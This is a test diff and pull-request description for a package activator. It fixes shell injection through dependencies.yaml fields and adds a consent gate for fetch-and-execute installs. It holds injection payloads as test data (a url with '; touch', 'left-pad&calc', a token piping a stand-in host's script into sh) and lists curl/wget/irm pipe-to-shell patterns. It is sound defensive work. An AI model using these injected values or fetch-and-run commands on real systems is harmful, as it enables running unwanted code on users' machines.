+describe("a model url cannot become a second command either", () => {
+  // The third field with the same shape: `repo`, `url`, `filename` and
+  // `install_to` are data out of dependencies.yaml, and the download line used
+  // to interpolate them into a shell string.
+  test.skipIf(!POSIX)("`;` in a model url stays inside the argument curl receives", () => {
+    const f = fixture("");
+    const sentinel = join(f.root, "pwned-model");
+    const log = join(f.root, "curl-calls.log");
+    const url = `https://example.invalid/m.bin; touch ${sentinel}`;
+    const installTo = join(f.root, "models");
+    writeFileSync(join(f.squadDir, "dependencies.yaml"), [
+      "models:",
+      "  - name: fixture-model",
+      "    source: url",
+      `    url: ${JSON.stringify(url)}`,
+      `    install_to: ${JSON.stringify(installTo)}`,
+      "    filename: m.bin",
+      "",
+    ].join("\n"));
+    fakeManager(f, "curl", log);
+    try {
+      const r = activate(f);
+      expect(r.status).toBe(0);
+      expect(existsSync(sentinel)).toBe(false);
+      expect(calls(log)).toEqual([["-L", "-o", join(installTo, "m.bin"), url]]);
+    } finally {
+      rmSync(f.root, { recursive: true, force: true });
+    }
+  }, 30_000);
+});
+
+describe("the Windows command line, built here instead of left to the runtime", () => {
+  // The tokens below are real: they come from the dependencies.yaml files that
+  // ship in the packs. libuv quotes an argument only when it holds a space, tab
+  // or double quote (`quote_cmd_arg`, src/win/process.c), so the ones WITHOUT a
+  // space are exactly the ones the runtime would hand to cmd.exe raw. The spawn
+  // itself cannot be exercised from a POSIX runner; the line can.
+  const plan = (token: string): ShellPlan => _windowsShellPlan(["npm", "install", token]);
+
+  test("a caret range survives byte for byte", () => {
+    // The correctness half of the bug, and it ships today: cmd.exe eats `^` as
+    // its escape character, so an unquoted `@remotion/cli@^4.0.0` reached npm as
+    // `@remotion/cli@4.0.0` — a different range, silently, with no error.
+    const p = plan("@remotion/cli@^4.0.0");
+    expect(p.ok).toBe(true);
+    expect((p as { line: string }).line).toBe('npm "install" "@remotion/cli@^4.0.0"');
+  });
+
+  test("every metacharacter a real spec carries is quoted, not refused", () => {
+    for (const token of [
+      "@remotion/cli@^4.0.0",
+      "remotion@^4.0.0",
+      "typescript@^5.0.0",
+      "requests >= 2.28",
+      "pyyaml >= 6.0",
+      "ccxt[async]",
+      "instaloader>=4.10",
+      "yt-dlp>=2024.0",
+      "pandas>=2.0",
+      "left-pad@1.x||2.x",
+    ]) {
+      const p = plan(token);
+      expect(p.ok).toBe(true);
+      expect((p as { line: string }).line).toBe(`npm "install" "${token}"`);
+    }
+  });
+
+  test("a payload is quoted into data rather than run", () => {
+    const p = plan("left-pad&calc");
+    expect(p.ok).toBe(true);
+    // Inside quotes cmd.exe reads `&` as a character, so npm gets one bad
+    // package name and says so, instead of cmd getting a second command.
+    expect((p as { line: string }).line).toBe('npm "install" "left-pad&calc"');
+  });
+
+  test("the four characters quoting cannot contain are named, one at a time", () => {
+    for (const [token, char] of [
+      ['left-pad"x', '"'],
+      ["%PATH%", "%"],
+      ["left-pad!x", "!"],
+      ["left-pad\ncalc", "\n"],
+    ] as const) {
+      const p = plan(token);
+      expect(p.ok).toBe(false);
+      expect((p as { char: string }).char).toBe(char);
+    }
+  });
+
+  test("only the shimmed manager takes that route", () => {
+    // pip, uv, curl and huggingface-cli are real executables on Windows, so
+    // their paths never build a command line at all. The difference is a
+    // decision made before any spawn: only the node path passes `windowsShim`.
+    const src = readFileSync(ACTIVATOR, "utf8");
+    expect(src).toContain("runArgv(argv, { windowsShim: true, cwd: g ?");
+    expect(src).toContain("runArgv(argv, { cwd: target })");
+    expect(src).toContain("runArgv(argv, { timeoutMs: 7200000 })");
+  });
+});
+
+describe("a repo url cannot become a second command either", () => {
+  // `services[].repo` and `custom_nodes[].repo` are the last two data fields
+  // that were still being interpolated into a shell line. `install_cmd`,
+  // `start_cmd`, `health_check` and `post_install[]` are NOT: those are command
+  // by design, written by the squad author, and they stay shell lines.
+  test.skipIf(!POSIX)("both clone paths pass the repo as one argument", () => {
+    const f = fixture("");
+    const svcSentinel = join(f.root, "pwned-service");
+    const nodeSentinel = join(f.root, "pwned-node");
+    const log = join(f.root, "git-calls.log");
+    const svcRepo = `https://example.invalid/s.git; touch ${svcSentinel}`;
+    const nodeRepo = `https://example.invalid/n.git; touch ${nodeSentinel}`;
+    const svcDir = join(f.root, "svc");
+    const nodesDir = join(f.root, "nodes");
+    writeFileSync(join(f.squadDir, "dependencies.yaml"), [
+      "services:",
+      "  - name: fixture-service",
+      `    repo: ${JSON.stringify(svcRepo)}`,
+      `    install_dir: ${JSON.stringify(svcDir)}`,
+      "custom_nodes:",
+      "  - name: fixture-node",
+      `    repo: ${JSON.stringify(nodeRepo)}`,
+      `    install_to: ${JSON.stringify(nodesDir)}`,
+      "",
+    ].join("\n"));
+    fakeManager(f, "git", log);
+    try {
+      const r = activate(f);
+      expect(r.status).toBe(0);
+      expect(existsSync(svcSentinel)).toBe(false);
+      expect(existsSync(nodeSentinel)).toBe(false);
+      expect(calls(log)).toEqual([
+        ["clone", svcRepo, svcDir],
+        ["clone", nodeRepo, join(nodesDir, "fixture-node")],
+      ]);
+    } finally {
+      rmSync(f.root, { recursive: true, force: true });
+    }
+  }, 30_000);
+});
+
+describe("the consent gate covers fetch-and-execute, not just sudo", () => {
+  // `system[].install.<platform>` is a shell line by design and stays one. What
+  // changes is what gets to run without being seen: the gate matched `sudo` and
+  // nothing else, so a remote script piped into a shell installed itself in
+  // silence. These are the commands that ship in the packs today.
+  test("the piped forms are recognized, with the url and the shell", () => {
+    for (const [cmd, url, shell] of [
+      ["curl -fsSL https://bun.sh/install | bash", "https://bun.sh/install", "bash"],
+      ["curl -fsSL https://x.ai/cli/install.sh | bash", "https://x.ai/cli/install.sh", "bash"],
+      ["curl -fsSL https://get.docker.com | sh", "https://get.docker.com", "sh"],
+      ["curl -fsSL https://ollama.com/install.sh | sudo bash", "https://ollama.com/install.sh", "bash"],
+      ["curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash - && sudo apt-get install -y nodejs", "https://deb.nodesource.com/setup_20.x", "bash"],
+      ["wget -qO- https://example.invalid/i.sh | sh", "https://example.invalid/i.sh", "sh"],
+      ["bash <(curl -fsSL https://example.invalid/i.sh)", "https://example.invalid/i.sh", "bash"],
+      ['sh -c "$(curl -fsSL https://example.invalid/i.sh)"', "https://example.invalid/i.sh", "sh"],
+      ['eval "$(curl -fsSL https://example.invalid/i.sh)"', "https://example.invalid/i.sh", "eval"],
+      ['powershell -c "irm https://bun.sh/install.ps1 | iex"', "https://bun.sh/install.ps1", "iex"],
+      ["Invoke-WebRequest https://example.invalid/i.ps1 | Invoke-Expression", "https://example.invalid/i.ps1", "Invoke-Expression"],
+    ] as const) {
+      expect(_fetchAndExecute(cmd)).toEqual({ url, shell, form: "direct" });
+    }
+  });
+
+  test("a pipe with no scheme in the url is still a pipe", () => {
+    // Shipped verbatim in the packs. There is nothing to name as the url, and
+    // the message says "a remote address" rather than inventing one.
+    expect(_fetchAndExecute('powershell -c "irm bun.sh/install.ps1 | iex"'))
+      .toEqual({ url: null, shell: "iex", form: "direct" });
+  });
+
+  test("the two-step form is recognized too, and says it is a guess", () => {
+    // Download an installer, then run it. No pipe, no substitution — the links
+    // are `&&`. This is `ebook-maestro-nirvana`, verbatim, shipped today in
+    // genesis-circle and publishing-knowledge, and it is the commonest shape of
+    // the same risk. It also exercises the worst realistic case: a glob, a
+    // `printf` with a redirection, embedded XML with quotes, and `$HOME`.
+    const verapdf = `curl -fsSL https://software.verapdf.org/rel/verapdf-installer.zip -o /tmp/verapdf.zip && unzip -oq /tmp/verapdf.zip -d /tmp/verapdf && printf '<?xml version="1.0"?><AutomatedInstallation langpack="eng"><com.izforge.izpack.panels.htmlhello.HTMLHelloPanel id="welcome"/><com.izforge.izpack.panels.target.TargetPanel id="install_dir"><installpath>$HOME/verapdf</installpath></com.izforge.izpack.panels.target.TargetPanel><com.izforge.izpack.panels.packs.PacksPanel id="sdk_pack_select"><pack index="0" name="veraPDF GUI" selected="true"/><pack index="1" name="veraPDF Sample Corpus" selected="false"/><pack index="2" name="veraPDF Documentation" selected="false"/></com.izforge.izpack.panels.packs.PacksPanel><com.izforge.izpack.panels.install.InstallPanel id="install"/><com.izforge.izpack.panels.finish.FinishPanel id="finish"/></AutomatedInstallation>' > /tmp/verapdf/auto.xml && sh /tmp/verapdf/verapdf-greenfield-*/verapdf-install /tmp/verapdf/auto.xml && mkdir -p $HOME/.local/bin && ln -sf $HOME/verapdf/verapdf $HOME/.local/bin/verapdf`;
+    expect(_fetchAndExecute(verapdf)).toEqual({
+      url: "https://software.verapdf.org/rel/verapdf-installer.zip",
+      shell: "sh",
+      form: "two_stage",
+    });
+  });
+
+  test("downloading is not executing, and an ordinary install is not either", () => {
+    // A gate that fires on `brew install` is a gate everyone passes with
+    // --confirm-heavy without reading it, which is worse than no gate. The two
+    // `curl` ones are the trap in the adversarial pass: the word appears, and
+    // nothing remote runs.
+    for (const cmd of [
+      "curl -L -o modelo.bin https://huggingface.co/org/model/resolve/main/model.bin",
+      "curl -fsSL https://example.invalid/a.tgz | tar -xz -C /usr/local",
+      "brew install curl",
+      "sudo apt install -y curl",
+      "brew install ffmpeg",
+      "apt-get install -y ffmpeg",
+      "sudo apt install -y ffmpeg",
+      "winget install --id Gyan.FFmpeg -e",
+      "git clone https://example.invalid/r.git",
+      // The anchor doing its job: a path that ends in `sh` is not an invocation.
+      "curl -fsSL https://example.invalid/a.zip -o /tmp/sh/a.zip",
+    ]) {
+      expect(_fetchAndExecute(cmd)).toBeNull();
+    }
+  });
+
+  test("a piped installer stops at exit 2 and the reason names the url and the shell", () => {
+    const f = fixture([
+      "system:",
+      "  - name: bun",
+      '    check: "command -v definitely-not-installed-xyz"',
+      "    install:",
+      '      darwin: "curl -fsSL https://bun.sh/install | bash"',
+      '      linux: "curl -fsSL https://bun.sh/install | bash"',
+      `      win32: ${JSON.stringify('powershell -c "irm https://bun.sh/install.ps1 | iex"')}`,
+      "",
+    ].join("\n"));
+    // Belt and braces: the command is the real one, and a stand-in `curl` in
+    // front of it on PATH means that if the gate ever regresses, the test
+    // fails without fetching anything. (Proven: run this against the ungated
+    // activator and it reaches the network.)
+    fakeManager(f, "curl", join(f.root, "curl-calls.log"));
+    try {
+      const r = activate(f);
+      expect(r.status).toBe(2);
+      const j = JSON.parse(r.stdout);
+      expect(j.confirmations_required.length).toBe(1);
+      const item = j.confirmations_required[0];
+      expect(item.fetches).toContain("bun.sh");
+      expect(item.executes_with).toMatch(/bash|iex/);
+      expect(item.needs_sudo).toBe(false);
+      // The command itself is in the message: it is what the buyer decides on.
+      expect(item.reason).toContain("bun.sh");
+      expect(item.reason).toContain("--confirm-heavy");
+      expect(item.reason).toContain(item.cmd);
+    } finally {
+      rmSync(f.root, { recursive: true, force: true });
+    }
+  }, 30_000);
+
+  test("the two-step form reaches the buyer as a two-step form, not as a pipe", () => {
+    // What the buyer sees is the point of this change: the message has to say
+    // which signal fired, because a fetch-then-run is a strong reading of the
+    // command and a pipe is a reading of nothing.
+    const install = "curl -fsSL https://example.invalid/i.zip -o /tmp/i.zip && unzip -oq /tmp/i.zip -d /tmp/i && sh /tmp/i/install";
+    const f = fixture([
+      "system:",
+      "  - name: two-step",
+      '    check: "command -v definitely-not-installed-xyz"',
+      "    install:",
+      `      darwin: ${JSON.stringify(install)}`,
+      `      linux: ${JSON.stringify(install)}`,
+      `      win32: ${JSON.stringify(install)}`,
+      "",
+    ].join("\n"));
+    fakeManager(f, "curl", join(f.root, "curl-calls.log"));
+    try {
+      const r = activate(f);
+      expect(r.status).toBe(2);
+      const item = JSON.parse(r.stdout).confirmations_required[0];
+      expect(item.execution_form).toBe("two_stage");
+      expect(item.fetches).toBe("https://example.invalid/i.zip");
+      expect(item.executes_with).toBe("sh");
+      expect(item.reason).toContain("two steps rather than a pipe");
+      expect(item.reason).toContain(install);
+    } finally {
+      rmSync(f.root, { recursive: true, force: true });
+    }
+  }, 30_000);
+
+  test("--confirm-heavy still lets it through, and an ordinary install never stops", () => {
+    const f = fixture([
+      "system:",
+      "  - name: ffmpeg",
+      '    check: "command -v definitely-not-installed-xyz"',
+      "    install:",
+      '      darwin: "brew install ffmpeg"',
+      '      linux: "brew install ffmpeg"',
+      '      win32: "brew install ffmpeg"',
+      "",
+    ].join("\n"));
+    // A stand-in `brew` so the negative case can run the install instead of
+    // asserting around it. Nothing is confirmed, so the command executes.
+    fakeManager(f, "brew", join(f.root, "brew-calls.log"));
+    try {
+      const r = activate(f);
+      const j = JSON.parse(r.stdout);
+      expect(j.confirmations_required.length).toBe(0);
+      expect(j.steps.system[0].status).not.toBe("confirmation_required");
+    } finally {
+      rmSync(f.root, { recursive: true, force: true });
+    }
+  }, 30_000);
+});


### PR DESCRIPTION
Five changes. Four are defects with separate causes; the fifth is a deliberate behaviour change to the consent gate, called out below because buyers will see it.

## 1. Command injection on the activation path (`skills/squads/lib/activator.js`)

`dependencies.yaml` carries two kinds of field and the activator ran both as a shell line.

**Command by design, untouched:** `system[].install.<platform>`, `install_cmd`, `start_cmd`, `health_check`, `post_install[]`. The squad author writes `brew install ffmpeg` there on purpose. A test pins that boundary so a later refactor does not "fix" it away.

**Data, and it was becoming command:** `node:` and `python:` tokens, `models[].url` / `repo` / `filename` / `install_to`, `services[].repo`, `custom_nodes[].repo`.

```yaml
node:
  - "left-pad; curl https://example.invalid/x.sh | sh"
models:
  - url: "https://example.invalid/m.bin; touch /tmp/pwned"
services:
  - repo: "https://example.invalid/s.git; touch /tmp/pwned"
```

All three ran a second command during `nrv activate`, with the user's own privileges and no gate in front. Wrapping the pip tokens in single quotes only moved the door: an apostrophe inside a token closes them.

Every one of those paths now spawns an argv array with no shell (`runArgv`). On macOS and Linux that closes it outright. `models[]` also stops splitting an `install_to` path that contains a space, which was the quieter half of the same bug.

### Windows: quote it here, do not leave it to the runtime

`pip`, `uv`, `curl`, `git` and `huggingface-cli` are real executables on Windows, so those paths spawn directly, with no shell anywhere.

`npm`, `pnpm` and `yarn` ship as `.cmd` shims that no runtime starts without a shell — and the runtime will **not** quote the token for us:

```c
  if (NULL == wcspbrk(source, L" \t\"")) {
    /* No quotation needed */
```
<sub>libuv, `src/win/process.c`, `quote_cmd_arg`</sub>

An argument with no space, tab or double quote reaches `cmd.exe` raw. **This is not hypothetical.** `@remotion/cli@^4.0.0` ships today in `creative-studio` and `genesis-circle`, and cmd.exe eats `^` as its own escape character: on Windows it was being installed as `@remotion/cli@4.0.0`. A different range, no error, nobody told. Swap the payload and the same hole runs `calc`: `left-pad&calc`.

The activator therefore builds the command line itself, with **every argument quoted**, and hands it to the shell path — `cmd.exe /d /s /c "<line>"`, where `/s` strips the outer pair the runtime adds and leaves ours standing. Inside those quotes `^ & | < > ( )` are data. Only four characters survive no quoting cmd.exe understands, and they are refused by name: `"`, `%`, `!`, newline. Across the 72 data fields in the 116 shipped `dependencies.yaml` files, none carries one.

An earlier revision of this PR refused the metacharacters instead of quoting them. That was wrong: the specs it would have refused (`@remotion/cli@^4.0.0`, `yt-dlp>=2024.0`, `ccxt[async]`) are the ones buyers already have.

## 2. The consent gate covers fetch-and-execute, not just sudo — behaviour change

`system[].install.<platform>` is a shell line by design, and the gate in front of it matched exactly one thing: `sudo`. Everything else ran. So `curl -fsSL https://bun.sh/install | bash`, shipped today in `brandcraft` and `grok-studio-nirvana`, executed a third party's script on the buyer's machine without asking anything, because someone said "install the dependencies". The exit-code contract already promised `2` for heavy installs; this fills that promise rather than inventing one.

**Now stops with `confirmation_required` and exit 2, in either shape.**

*Direct* — a pipe or a substitution, and not arguable: `curl … | bash` / `| sh` / `| zsh` (flags, redirections or a `sudo -E` in between), `wget -qO- … | sh`, `bash <(curl …)`, `sh <(wget …)`, `sh -c "$(curl …)"`, `eval "$(curl …)"`, and on PowerShell `iwr … | iex`, `irm … | iex`, `Invoke-WebRequest … | Invoke-Expression`.

*Two-step* — no pipe anywhere, and the commoner shape in the wild: fetch a remote url and, in the same command, run an interpreter or a downloaded path. `ebook-maestro-nirvana` ships exactly this today in `genesis-circle` and `publishing-knowledge`:

```
curl -fsSL https://software.verapdf.org/rel/verapdf-installer.zip -o /tmp/verapdf.zip
  && unzip -oq /tmp/verapdf.zip -d /tmp/verapdf
  && printf '<?xml …AutomatedInstallation…>' > /tmp/verapdf/auto.xml
  && sh /tmp/verapdf/verapdf-greenfield-*/verapdf-install /tmp/verapdf/auto.xml
```

The item carries `fetches`, `executes_with`, `execution_form` and the exact `cmd`, and the message spells all of them out — including **which signal fired**, because a pipe into a shell is not arguable while a fetch plus a runner in one command is a strong reading of it. The second says so and asks you to read the command first. The interpreter must be in *command position* (start of line, or after `;`, `&&`, `||`, `|`, `(`, newline, past any `sudo -E`), so a path like `/tmp/sh/a.zip` is not mistaken for an invocation of `sh`.

**Never stops:** `curl -o model.bin <url>`, `curl … | tar -xz`, `brew install curl`, `sudo apt install -y curl`, `brew install`, `apt-get install`, `winget install`, `git clone`. Downloading is not executing, and a gate that fires on ordinary installs is a gate everyone learns to pass without reading.

**Blast radius, measured** over every `system[].install` declaration in the packs (590 across 340 manifests): **75** stop for a direct form (6 distinct commands), **5** for the two-step form (**1** distinct command, veraPDF), **145** keep stopping for sudo exactly as before, **365** pass untouched. The two-step rule added exactly one command and zero false positives.

`--confirm-heavy` is the same gesture that already accepted sudo and >1 GB downloads. `skills/squads/SKILL.md` had two lines describing what that flag accepts; both were made incomplete by this change and were updated.

## 3. `install-content.ts` ignored `NIRVANA_HOME` / `SQUADS_DIR`

The overlay resolved `~/squads`, `~/businesses`, `~/businesses/_library/dna` and `~/.nirvana/packs` from `os.homedir()`, once, at module scope, while `installer.ts` honors `NIRVANA_HOME`, `SQUADS_DIR`, `BUSINESSES_DIR` and `DNA_LIBRARY`. A non-default Nirvana home got the engine in one place and the paid content in another. It also made the overlay untestable by environment: `os.homedir()` follows `$HOME` on macOS and Linux and `%USERPROFILE%` on Windows, which is what turned `verify-install-hooks.test.ts` red on the Windows runner and nowhere else (PR #133). The four roots are lazy now. `~/.nirvana/skills/VERSION` and `~/.local/bin/nrv` stay on `homedir()`: that is where `scripts/install.ts` puts the engine itself.

## 4. `nrv run-track list` printed an id `close` refuses

The listing showed `project_id`, a directory basename; `beat` and `close` require the `run_id`. The one command that discovers open runs handed over an identifier the two commands that act on them answer `not found` to.

Of the two options, this takes the first: **print the `run_id`**, keeping `project_id` as a second labelled column. The alternative (teaching `beat`/`close` to accept a `project_id` when it resolves to exactly one live run) buys nothing the listing does not already give and adds a resolution rule with its own ambiguous-input failure mode. A test does the round trip: open → list → parse the id out of the listing → close.

## 5. The six READMEs were two releases behind

All said "currently 0.8.1" with the engine on 0.10.0, and none mentioned `nrv validate` or `nrv migrate`. Status line corrected and one row added per command in the existing table, in all six languages. The `0.8.0` mention on line 78 is correct historical context and was left alone.

## Verification

Areas this diff touches, per the verification contract (the full suite and `check:all` run once over the integrated whole, not here):

- `bun test skills/squads/tests` — 96 pass / 0 fail
- `bun test skills/harness/tests` — 1362 pass / 4 skip / 1 fail
- `bun test skills/_shared/tests` — 556 pass / 12 skip / 0 fail
- `bun scripts/check-english-source.ts --strict` — clean
- `bun scripts/check-changelog-parity.ts --strict` — clean (55 versions, 169 sections)
- `bun scripts/check-skillmd-command-parity.ts --strict` — clean
- `git diff --check` — clean

Every new test was run against the previous commit and fails there.

The one harness failure is the known worktree-environment one, and it reproduces identically with this branch's `install-content.ts` reverted to `main`'s:

```
buyer-path.test.ts — error: Cannot find package 'yaml' from
'/private/var/folders/.../nrv-buyer-*/home/.nirvana/skills/_shared/lib/entity-graph.ts'
```

### What was not verified

No Windows machine was involved: the quoted command line is unit-tested, the `cmd.exe` spawn behind it is not, and the libuv rule was read from `libuv/src/win/process.c` (v1.x) rather than assumed. The fetch-and-execute detector is tested against the real install commands from the packs and measured against all 590 of them, but it is pattern recognition, not a sandbox: a deliberately obfuscated command (a url built in a variable, a base64 decode piped onward) is out of its reach by construction. Two shapes it deliberately does not treat as execution are a downloaded package handed to `dpkg -i` or `rpm -i`; the line has to stop somewhere, and package managers are precisely what this gate is designed not to fire on. The sudo half is unchanged.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
